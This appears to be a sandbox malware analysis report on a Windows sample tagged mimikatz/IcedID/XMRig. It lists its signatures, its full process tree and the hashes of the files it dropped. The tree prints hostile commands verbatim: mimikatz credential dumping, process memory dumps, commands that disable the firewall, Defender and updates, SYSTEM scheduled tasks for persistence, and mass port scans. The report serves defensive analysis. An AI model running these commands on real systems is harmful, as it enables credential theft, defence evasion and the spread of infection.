Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
-
submitted
26/04/2024, 04:51
General
-
Target
2024-04-26_7a3ae223963d66629c6eef612788d329_hacktools_icedid_mimikatz.exe
-
Size
14.0MB
-
MD5
7a3ae223963d66629c6eef612788d329
-
SHA1
31320e65e9f505225d881c7e789fed9d555f0ac2
-
SHA256
71ab135a807ba035eb9a789513e7d75e928de9b44cf2ae1212e887cb310e8017
-
SHA512
f9777f352d1d013bda2d185fd9c21eca473db90e02364ae26ff6fc6e44277b2c527e2b9d60becfb36c3b5f625432a3632c8c85b71e5c5a98414766fbd05766da
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (30302) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
-
UPX dump on OEP (original entry point) 42 IoCs
-
XMRig Miner payload 12 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Sets file execution options in registry 2 TTPs 40 IoCs
-
Executes dropped EXE 29 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 39 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\adlsugtbl\skgihe.exe"C:\Windows\TEMP\adlsugtbl\skgihe.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-04-26_7a3ae223963d66629c6eef612788d329_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-04-26_7a3ae223963d66629c6eef612788d329_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tctzgupj\lqrueqh.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
-
-
C:\Windows\tctzgupj\lqrueqh.exeC:\Windows\tctzgupj\lqrueqh.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\tctzgupj\lqrueqh.exeC:\Windows\tctzgupj\lqrueqh.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ztisiemyb\tsbuunlgb\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\ztisiemyb\tsbuunlgb\wpcap.exeC:\Windows\ztisiemyb\tsbuunlgb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ztisiemyb\tsbuunlgb\ipegttetp.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\ztisiemyb\tsbuunlgb\Scant.txt2⤵
-
C:\Windows\ztisiemyb\tsbuunlgb\ipegttetp.exeC:\Windows\ztisiemyb\tsbuunlgb\ipegttetp.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\ztisiemyb\tsbuunlgb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ztisiemyb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ztisiemyb\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\ztisiemyb\Corporate\vfshost.exeC:\Windows\ztisiemyb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "chtuetzqi" /ru system /tr "cmd /c C:\Windows\ime\lqrueqh.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "chtuetzqi" /ru system /tr "cmd /c C:\Windows\ime\lqrueqh.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "quyctlucl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tctzgupj\lqrueqh.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "quyctlucl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tctzgupj\lqrueqh.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "eqdlgggui" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\adlsugtbl\skgihe.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "eqdlgggui" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\adlsugtbl\skgihe.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\TEMP\ztisiemyb\ncttciszb.exeC:\Windows\TEMP\ztisiemyb\ncttciszb.exe -accepteula -mp 780 C:\Windows\TEMP\ztisiemyb\780.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\ztisiemyb\ncttciszb.exeC:\Windows\TEMP\ztisiemyb\ncttciszb.exe -accepteula -mp 316 C:\Windows\TEMP\ztisiemyb\316.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ztisiemyb\ncttciszb.exeC:\Windows\TEMP\ztisiemyb\ncttciszb.exe -accepteula -mp 2112 C:\Windows\TEMP\ztisiemyb\2112.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ztisiemyb\ncttciszb.exeC:\Windows\TEMP\ztisiemyb\ncttciszb.exe -accepteula -mp 2556 C:\Windows\TEMP\ztisiemyb\2556.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ztisiemyb\ncttciszb.exeC:\Windows\TEMP\ztisiemyb\ncttciszb.exe -accepteula -mp 2784 C:\Windows\TEMP\ztisiemyb\2784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ztisiemyb\ncttciszb.exeC:\Windows\TEMP\ztisiemyb\ncttciszb.exe -accepteula -mp 2828 C:\Windows\TEMP\ztisiemyb\2828.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ztisiemyb\ncttciszb.exeC:\Windows\TEMP\ztisiemyb\ncttciszb.exe -accepteula -mp 3080 C:\Windows\TEMP\ztisiemyb\3080.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ztisiemyb\ncttciszb.exeC:\Windows\TEMP\ztisiemyb\ncttciszb.exe -accepteula -mp 3820 C:\Windows\TEMP\ztisiemyb\3820.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ztisiemyb\ncttciszb.exeC:\Windows\TEMP\ztisiemyb\ncttciszb.exe -accepteula -mp 3908 C:\Windows\TEMP\ztisiemyb\3908.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ztisiemyb\ncttciszb.exeC:\Windows\TEMP\ztisiemyb\ncttciszb.exe -accepteula -mp 3976 C:\Windows\TEMP\ztisiemyb\3976.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ztisiemyb\ncttciszb.exeC:\Windows\TEMP\ztisiemyb\ncttciszb.exe -accepteula -mp 4048 C:\Windows\TEMP\ztisiemyb\4048.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ztisiemyb\ncttciszb.exeC:\Windows\TEMP\ztisiemyb\ncttciszb.exe -accepteula -mp 4428 C:\Windows\TEMP\ztisiemyb\4428.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ztisiemyb\ncttciszb.exeC:\Windows\TEMP\ztisiemyb\ncttciszb.exe -accepteula -mp 1936 C:\Windows\TEMP\ztisiemyb\1936.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ztisiemyb\ncttciszb.exeC:\Windows\TEMP\ztisiemyb\ncttciszb.exe -accepteula -mp 1112 C:\Windows\TEMP\ztisiemyb\1112.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ztisiemyb\ncttciszb.exeC:\Windows\TEMP\ztisiemyb\ncttciszb.exe -accepteula -mp 3192 C:\Windows\TEMP\ztisiemyb\3192.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ztisiemyb\ncttciszb.exeC:\Windows\TEMP\ztisiemyb\ncttciszb.exe -accepteula -mp 624 C:\Windows\TEMP\ztisiemyb\624.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ztisiemyb\ncttciszb.exeC:\Windows\TEMP\ztisiemyb\ncttciszb.exe -accepteula -mp 2808 C:\Windows\TEMP\ztisiemyb\2808.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ztisiemyb\ncttciszb.exeC:\Windows\TEMP\ztisiemyb\ncttciszb.exe -accepteula -mp 3232 C:\Windows\TEMP\ztisiemyb\3232.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\ztisiemyb\tsbuunlgb\scan.bat2⤵
-
C:\Windows\ztisiemyb\tsbuunlgb\umuezbbkc.exeumuezbbkc.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\gyggue.exeC:\Windows\SysWOW64\gyggue.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\lqrueqh.exe1⤵
-
C:\Windows\ime\lqrueqh.exeC:\Windows\ime\lqrueqh.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tctzgupj\lqrueqh.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\tctzgupj\lqrueqh.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\adlsugtbl\skgihe.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\adlsugtbl\skgihe.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\lqrueqh.exe1⤵
-
C:\Windows\ime\lqrueqh.exeC:\Windows\ime\lqrueqh.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tctzgupj\lqrueqh.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\tctzgupj\lqrueqh.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\adlsugtbl\skgihe.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\adlsugtbl\skgihe.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
8.6MB
MD598746d9e76211262462e90f89207c867
SHA1de2cd4ea2ec2dfc35992c1712291859fcae998b0
SHA256fda2ba08bd3fab39f10c43dae4901057df7c2ad147904db9ca3add64e1c08d4e
SHA512667467649987e454d4b677ca4ad806fff927d5f58413316fb81b15bfba8ba3555a2a64d5f28a6f6683b0465f957d344e860e42dd53ed558771ca3b0d5cbf0c28
-
Filesize
26.0MB
MD5206610127d32ecfd0f355bbc884eaa2c
SHA1371a610dbc1d4241114ccd6e409c346649f15ce1
SHA25650e638c80b3772cd729750d1814104e26948047ca0b8ccda6e37b2e06374975a
SHA512920b693c817573194aa4f486c37efc11fcbc3f51a98a36a20a0cfa46eb17878cb269f27464057c5a4235db1bbd1093a0f77967018eec44cd5f6ac5d10ec906d2
-
Filesize
4.2MB
MD5f5abdbccb31484c978252f169e5e95df
SHA116f99363498d6f4fb5689fe5f1841e5374382f32
SHA256250a0e2e3df1b79f83d30a5331a22a501b16aa57489b769095d2111647fde997
SHA51256497497a9d2ac19614725286f112959cecd1275ae8ec44a5488a87a930f56b27f4a69764293cdf04e2df379fe03f78c20f19f20c94bdbf4e1a1cd996b882054
-
Filesize
3.9MB
MD56584d2d9d40c72da1e135eba578f7227
SHA1c7b36c429b0916b9290ed0c6849e1ce54127928f
SHA2563d2b0efd46067f8d530a4fbe41a582c7a4e14d272f431f33732796f788e1dfdf
SHA5120125a34e7cd2abaa38f9e27198d00b40d124da3857b68903414143be34f01682850d3c8fd4279a053604f50c89e2d56f04a07f3e02bbb73ae2887479c5438750
-
Filesize
2.9MB
MD5d282d1fcc5a6f585762b18bc294ae98e
SHA1d5d64c6b783de4f3ce1caa3a0b5d67866ebc8c40
SHA25611830561dc41fb5fbc0fc4c189588c8b6706adf44e8f5e9e653ebb042a79960f
SHA512e008044cc845de1cdad203e112349d0ae0826327a07c3bbd7ab0437f9d500e9986cb0453fd9963731acf3d4f9dc793fd8c33d4e6acb521a58f4119961257ed6d
-
Filesize
7.7MB
MD5f062b857a73026194c51c05f461857ae
SHA146f1b84d41f351236d0df1ec37bddc2b908ebb13
SHA256506ec9d415b098e8c0c7e33f86586051cb94488d88cd61dad77d857e994586dc
SHA512f0a71ff0ca959d81ec04a9a4b1c2436727a86a3c3e4fb9ccf5425ce517364deb5402b4d2856e77189121801e1a72ae902d4d9bb494b0006ed525f1520a99d587
-
Filesize
806KB
MD5c1618977723c170d5997fe753a5dbbac
SHA128ae91413412d887db8f70b2923b1d171690fe0d
SHA256e8424d5fcd56795d0575b16a7995c10c2bef2c27644fec79db186260cccadccf
SHA512ba5fa52846e66dfa69bc8d78807ae73941533f71677dfb675a91423d6450fa6af5434521936b4798278a426e6fe3855ff7b5ceb93db3c6c8eb60dbe11a7d069e
-
Filesize
33.3MB
MD567d23a58fc5d54e25f1610db12f01a9a
SHA1bf4b258cbcbcb63e4de02026d8d9bf1cf540bc29
SHA256e5fa391fcf83b6b344530ca2a56651dce1d5a9320e1965debb26dac1c72cba0c
SHA5127f97218d9f4acea4d52148adb64fd7cb7a4696bc83f18d4b1717627e66b585dd1992613d2066ed451e27ba94c91f9515d03c57481743b3d33c5f9e31e9129ef7
-
Filesize
3.0MB
MD5e05aeea8891e15b4a51c4b443b5d1996
SHA1086ec08f7c6169583699d27b0710b0b53af46a12
SHA256b85527e4cfb8d8fb461d7e9c3c421e3fb7cdcac04f6e09cd6700fe31cb6dc8f8
SHA5122ff9e26efc09e17275df5d3177740fdcd23ebf3c4af04c0d1014074e1643388e564106c0078065058611759a9d55ae9d4dd747bcb1a216b767cefd6284220bf0
-
Filesize
2.7MB
MD537a7b9a952e013654c2acdb817e81deb
SHA1415c4e63f6e7c5bda20e8b66fb4080a2f0bc4859
SHA25605fd7d57fca8164ddafd4ca7631447fc2360e3cbd69053b07587e36a93ed27da
SHA512b897512556b6de15882e16264ae290b5a7a5e8891701eb9449f7aa2af111fe84c63e5ee6e23952fade4ed144b33c1736000272208edca6cbfa9b3a57377ac45b
-
Filesize
21.3MB
MD514b91c4cce54075119a4a44a51166794
SHA101f4e18a3b7f93be50e6708d9b68875e6367f3fc
SHA256066c2c9e2494964471becff3da091519227d3502db6cf5baa73f526e3a942c72
SHA512c241e8af2b6eb25ce690b95a41a08152793f520b3ff006cc203d697f443fe469d90d3bcf9cf5b08ccdb130ce56cfaaef395831e6a2974bebcd9c5567b777aac0
-
Filesize
11.0MB
MD5fe8629940f5d659fb8b43572c01b3c79
SHA12f0604126a9974be8e0c086ea5c0b6e27c86e061
SHA25623a0dbabda40f3f5331bb2f0e0e3ade28a2132d1629609d2412101158044f381
SHA5123b91fd2e2d94dba5f09c209c1f936520f894f090f89eb321971bf54222c0b64e83f63e83b70c0eb92fe96f480c3939ad8ec2a36ed984787cb67c5556f5858470
-
